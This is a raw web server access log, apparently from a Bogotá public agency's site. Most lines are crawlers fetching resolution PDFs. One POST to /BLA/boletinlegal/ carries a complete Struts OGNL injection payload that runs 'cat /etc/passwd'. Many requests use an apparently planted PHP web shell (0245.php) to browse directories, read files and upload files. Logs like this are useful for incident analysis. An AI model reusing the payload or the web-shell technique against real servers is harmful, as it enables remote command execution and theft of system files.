52.70.240.171 - - [25/Apr/2024:05:03:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1630.pdf HTTP/1.1" 200 302619
47.128.29.154 - - [25/Apr/2024:05:03:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cariali%5C&f=5.png&white=1 HTTP/1.1" 200 109
3.224.220.101 - - [25/Apr/2024:05:03:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0635.pdf HTTP/1.1" 200 301427
23.22.35.162 - - [25/Apr/2024:05:03:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0634.pdf HTTP/1.1" 200 285858
23.22.35.162 - - [25/Apr/2024:05:03:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1629.pdf HTTP/1.1" 200 728317
3.224.220.101 - - [25/Apr/2024:05:03:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0632.pdf HTTP/1.1" 200 286773
20.168.255.84 - - [25/Apr/2024:05:03:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4236.pdf HTTP/1.1" 200 418317
52.70.240.171 - - [25/Apr/2024:05:03:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1628.pdf HTTP/1.1" 200 349740
52.70.240.171 - - [25/Apr/2024:05:03:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0628.pdf HTTP/1.1" 200 484753
47.128.43.212 - - [25/Apr/2024:05:03:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Ccss&f=buttons.css HTTP/1.1" 200 3032
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_css HTTP/1.1" 200 134
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
52.70.240.171 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1627.pdf HTTP/1.1" 200 627429
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.43.212 - - [25/Apr/2024:05:03:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:05:03:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0627.pdf HTTP/1.1" 200 367333
172.22.2.4 - - [25/Apr/2024:05:02:57 -0500] "POST /BLA/boletinlegal/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1" 200 32715
23.22.35.162 - - [25/Apr/2024:05:03:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0625.pdf HTTP/1.1" 200 2239190
3.224.220.101 - - [25/Apr/2024:05:03:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1626.pdf HTTP/1.1" 200 527962
23.22.35.162 - - [25/Apr/2024:05:03:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0597.pdf HTTP/1.1" 200 306663
3.224.220.101 - - [25/Apr/2024:05:03:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1625.pdf HTTP/1.1" 200 377053
23.22.35.162 - - [25/Apr/2024:05:03:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0596.pdf HTTP/1.1" 200 308032
47.128.28.152 - - [25/Apr/2024:05:03:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cfiery&f=3.png HTTP/1.1" 200 15460
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.28.152 - - [25/Apr/2024:05:03:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
23.22.35.162 - - [25/Apr/2024:05:03:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1624.pdf HTTP/1.1" 200 619322
23.22.35.162 - - [25/Apr/2024:05:04:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0593.pdf HTTP/1.1" 200 249396
3.224.220.101 - - [25/Apr/2024:05:04:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1623.pdf HTTP/1.1" 200 359038
23.22.35.162 - - [25/Apr/2024:05:04:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0589.pdf HTTP/1.1" 200 291633
52.70.240.171 - - [25/Apr/2024:05:04:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1621.pdf HTTP/1.1" 200 354205
3.224.220.101 - - [25/Apr/2024:05:04:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1619.pdf HTTP/1.1" 200 292185
47.128.27.221 - - [25/Apr/2024:05:04:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-content%5Cthemes%5Ctwentyfourteen%5Cimages%5C HTTP/1.1" 200 3100
66.249.66.19 - - [25/Apr/2024:05:04:22 -0500] "GET /BLA/resoluciones/AUTOS%202012/1055.pdf HTTP/1.1" 200 210353
52.70.240.171 - - [25/Apr/2024:05:04:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0588.pdf HTTP/1.1" 200 273375
52.70.240.171 - - [25/Apr/2024:05:04:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1618.pdf HTTP/1.1" 200 289182
23.22.35.162 - - [25/Apr/2024:05:04:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0578.pdf HTTP/1.1" 200 274729
3.224.220.101 - - [25/Apr/2024:05:04:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0577.pdf HTTP/1.1" 200 304953
23.22.35.162 - - [25/Apr/2024:05:04:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/01617.pdf HTTP/1.1" 200 292026
23.22.35.162 - - [25/Apr/2024:05:04:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0572.pdf HTTP/1.1" 200 429859
47.128.32.209 - - [25/Apr/2024:05:04:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page101_thumbnail.jpg&imgsize=100 HTTP/1.1" 200 16241
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.32.209 - - [25/Apr/2024:05:04:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.32.209 - - [25/Apr/2024:05:04:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.32.209 - - [25/Apr/2024:05:04:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.32.209 - - [25/Apr/2024:05:04:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.32.209 - - [25/Apr/2024:05:04:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
23.22.35.162 - - [25/Apr/2024:05:04:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1616.pdf HTTP/1.1" 200 293535
3.224.220.101 - - [25/Apr/2024:05:04:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0570.pdf HTTP/1.1" 200 311072
3.224.220.101 - - [25/Apr/2024:05:04:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1614.pdf HTTP/1.1" 200 269987
23.22.35.162 - - [25/Apr/2024:05:04:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0569.pdf HTTP/1.1" 200 314775
23.22.35.162 - - [25/Apr/2024:05:05:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1613.pdf HTTP/1.1" 200 292767
52.70.240.171 - - [25/Apr/2024:05:05:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0568.pdf HTTP/1.1" 200 324337
47.128.115.184 - - [25/Apr/2024:05:05:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=tools&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Ckatt005%5C HTTP/1.1" 200 3045
3.224.220.101 - - [25/Apr/2024:05:05:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1603.pdf HTTP/1.1" 200 354885
3.224.220.101 - - [25/Apr/2024:05:05:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0567.pdf HTTP/1.1" 200 321283
52.70.240.171 - - [25/Apr/2024:05:05:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1602.pdf HTTP/1.1" 200 326394
23.22.35.162 - - [25/Apr/2024:05:05:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0566.pdf HTTP/1.1" 200 248029
3.224.220.101 - - [25/Apr/2024:05:05:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1601.pdf HTTP/1.1" 200 290910
23.22.35.162 - - [25/Apr/2024:05:05:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0565.pdf HTTP/1.1" 200 357633
47.128.48.89 - - [25/Apr/2024:05:05:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cpaisa%5C HTTP/1.1" 200 2831
3.224.220.101 - - [25/Apr/2024:05:05:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1600.pdf HTTP/1.1" 200 335916
52.70.240.171 - - [25/Apr/2024:05:05:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0564.pdf HTTP/1.1" 200 370091
3.224.220.101 - - [25/Apr/2024:05:05:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1599.pdf HTTP/1.1" 200 290488
18.191.46.36 - - [25/Apr/2024:05:05:47 -0500] "GET /robots.txt HTTP/1.1" 404 1018
18.191.46.36 - - [25/Apr/2024:05:05:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7546.pdf HTTP/1.1" 200 515096
23.22.35.162 - - [25/Apr/2024:05:05:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0563.pdf HTTP/1.1" 200 235614
3.224.220.101 - - [25/Apr/2024:05:05:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0562.pdf HTTP/1.1" 200 233024
172.22.2.4 - - [25/Apr/2024:05:04:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.224.220.101 - - [25/Apr/2024:05:05:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1598.pdf HTTP/1.1" 200 293554
47.128.61.116 - - [25/Apr/2024:05:05:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cneuland%5C&f=4.png&white=1 HTTP/1.1" 200 168
23.22.35.162 - - [25/Apr/2024:05:06:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0561.pdf HTTP/1.1" 200 236596
3.224.220.101 - - [25/Apr/2024:05:06:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1596.pdf HTTP/1.1" 200 257521
52.70.240.171 - - [25/Apr/2024:05:06:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0560.pdf HTTP/1.1" 200 234407
23.22.35.162 - - [25/Apr/2024:05:06:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1595.pdf HTTP/1.1" 200 788346
3.224.220.101 - - [25/Apr/2024:05:06:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0559.pdf HTTP/1.1" 200 1877920
23.22.35.162 - - [25/Apr/2024:05:06:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1591.pdf HTTP/1.1" 200 358548
47.128.54.25 - - [25/Apr/2024:05:06:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page43_thumbnail.jpg&imgsize=50 HTTP/1.1" 200 16213
47.128.54.25 - - [25/Apr/2024:05:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.54.25 - - [25/Apr/2024:05:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.54.25 - - [25/Apr/2024:05:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.54.25 - - [25/Apr/2024:05:06:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.54.25 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
23.22.35.162 - - [25/Apr/2024:05:06:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0558.pdf HTTP/1.1" 200 230668
23.22.35.162 - - [25/Apr/2024:05:06:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1589.pdf HTTP/1.1" 200 411888
52.70.240.171 - - [25/Apr/2024:05:06:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0557.pdf HTTP/1.1" 200 231350
23.22.35.162 - - [25/Apr/2024:05:06:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/01582.pdf HTTP/1.1" 200 293400
52.70.240.171 - - [25/Apr/2024:05:06:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0556.pdf HTTP/1.1" 200 228440
3.224.220.101 - - [25/Apr/2024:05:06:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0555.pdf HTTP/1.1" 200 230899
172.22.2.4 - - [25/Apr/2024:05:05:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.124.17 - - [25/Apr/2024:05:06:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5C&f=.htaccess&imgsize=100 HTTP/1.1" 200 3157
47.128.124.17 - - [25/Apr/2024:05:06:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_htaccess HTTP/1.1" 200 117
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.17 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:05:06:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1581.pdf HTTP/1.1" 200 271132
186.29.66.12 - - [25/Apr/2024:05:06:51 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
23.22.35.162 - - [25/Apr/2024:05:06:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0554.pdf HTTP/1.1" 200 231357
186.29.66.12 - - [25/Apr/2024:05:06:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [25/Apr/2024:05:06:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41163
186.29.66.12 - - [25/Apr/2024:05:06:57 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12402
186.29.66.12 - - [25/Apr/2024:05:06:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:06:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
3.224.220.101 - - [25/Apr/2024:05:06:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1573.pdf HTTP/1.1" 200 350702
52.70.240.171 - - [25/Apr/2024:05:07:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0553.pdf HTTP/1.1" 200 304277
186.29.66.12 - - [25/Apr/2024:05:07:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
3.224.220.101 - - [25/Apr/2024:05:07:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1571.pdf HTTP/1.1" 200 435228
52.70.240.171 - - [25/Apr/2024:05:07:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0552.pdf HTTP/1.1" 200 238813
3.224.220.101 - - [25/Apr/2024:05:07:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1567.pdf HTTP/1.1" 200 221287
47.128.47.143 - - [25/Apr/2024:05:07:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Clicenses%5Clibpng%5C&sort=3a HTTP/1.1" 200 3371
47.128.47.143 - - [25/Apr/2024:05:07:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.47.143 - - [25/Apr/2024:05:07:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_license HTTP/1.1" 200 1034
201.245.192.253 - - [25/Apr/2024:05:05:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
23.22.35.162 - - [25/Apr/2024:05:07:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0551.pdf HTTP/1.1" 200 233543
23.22.35.162 - - [25/Apr/2024:05:07:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1563.pdf HTTP/1.1" 200 361326
186.29.66.12 - - [25/Apr/2024:05:07:22 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2220
52.70.240.171 - - [25/Apr/2024:05:07:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0549.pdf HTTP/1.1" 200 374984
186.29.66.12 - - [25/Apr/2024:05:07:24 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16474
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:26 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
23.22.35.162 - - [25/Apr/2024:05:07:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1554.pdf HTTP/1.1" 200 260085
23.22.35.162 - - [25/Apr/2024:05:07:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0548.pdf HTTP/1.1" 200 233213
52.70.240.171 - - [25/Apr/2024:05:07:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1553.pdf HTTP/1.1" 200 259933
52.70.240.171 - - [25/Apr/2024:05:07:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0547.pdf HTTP/1.1" 200 5703974
52.70.240.171 - - [25/Apr/2024:05:07:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1552.pdf HTTP/1.1" 200 260747
23.22.35.162 - - [25/Apr/2024:05:07:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0545.pdf HTTP/1.1" 200 267757
47.128.115.64 - - [25/Apr/2024:05:07:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=update&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cquake%5C HTTP/1.1" 200 2682
186.29.66.12 - - [25/Apr/2024:05:07:51 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
3.224.220.101 - - [25/Apr/2024:05:07:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1551.pdf HTTP/1.1" 200 261048
201.245.192.253 - - [25/Apr/2024:05:07:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41163
186.29.66.12 - - [25/Apr/2024:05:07:52 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64536
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.66.12 - - [25/Apr/2024:05:07:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
